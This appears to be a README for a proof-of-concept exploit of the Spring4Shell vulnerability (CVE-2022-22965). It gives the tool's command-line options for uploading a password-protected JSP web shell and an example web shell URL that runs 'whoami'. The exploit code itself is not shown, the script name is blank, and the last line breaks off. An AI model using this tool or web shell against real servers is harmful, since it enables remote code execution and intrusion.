# Spring4Shell-CVE-2022-22965-POC

ghost㉿uchiha:~$ ./ --help                                     
usage: [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)

## Usage
ghost㉿uchiha:~$ ./ http://url/
Shell Uploaded Successfully!
Your shell can be found at: http://url/tomcatwar.jsp?pwd=evil&cmd=whoami

Modified version of